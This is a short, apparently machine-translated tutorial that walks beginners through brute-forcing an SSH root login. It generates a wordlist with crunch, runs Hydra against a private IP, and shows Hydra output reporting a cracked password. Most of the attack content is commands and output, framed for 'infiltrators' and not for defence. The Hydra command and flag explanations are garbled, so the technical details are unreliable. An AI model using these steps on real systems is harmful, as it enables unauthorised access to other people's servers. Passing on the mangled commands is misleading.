Kali brute force cracking course

This article is original, reprint please indicate the source and author!
Kali is a powerful weapon for infiltrators. Today, we will show beginners how to achieve burst quickly. The tools they need can be found in Kali. Without further ado, let’s get started
1. Open the terminal and run the command Crunch, which is a dictionary generation tool that can generate dictionaries according to users’ requirements. You can refer to the manual for the specific parameters, which can be briefly explained here:
crunch 1 4 charset.lst lalpha -o mypwd.txt
The above command generates a dictionary with a minimum of one character and a maximum of four characters. This dictionary is output to mypwd.txt file (so the -o option is used). Charset.lst lalpha is defined as the lalpha option in charset.lst file.
2 dictionary generation, the following please out of the Hydra, this tool parameters are also a lot of, you can look at the manual, here simply said:
Hydra -l root -w 10 – P PWD. TXT 14 – v – t 192.168.1.106 SSH

– l specify a user name, if you are not sure what is the target user name, that can put all of the user name in the dictionary file, and then use the -l user. TXT to specify a user name, – 10 is to specify no more than 10 s w, – P is specified password dictionary, also is the dictionary file generated in step, can pay attention to the path to find oh, – t is the number of threads, the default is 16, -V is the display of cracking process information, and finally the target IP and protocol.
After running, the target host was successfully cracked, as follows:

hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak – for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2015-04-05 17:09:58
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort…
[DATA] 14 tasks, 1 server, 7380 login tries (l:1/p:7380), ~527 tries per task
[DATA] attacking service ssh on port 22
[VERBOSE] Resolving addresses … done
[ERROR] could not connect to target port 22
[ERROR] ssh protocol error
[ERROR] could not connect to target port 22
[ERROR] ssh protocol error
[VERBOSE] Retrying connection for Child 10
[VERBOSE] Retrying connection for child 12
[22][SSH] host: 192.168.1.106 login: root password: S
[STATUS] attack finished for 192.168.1.106 (waiting for children to complete tests)
1 of 1 target successful completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-04-05 17:10:15

2015. The tomb-sweeping day. Suvir

Read More: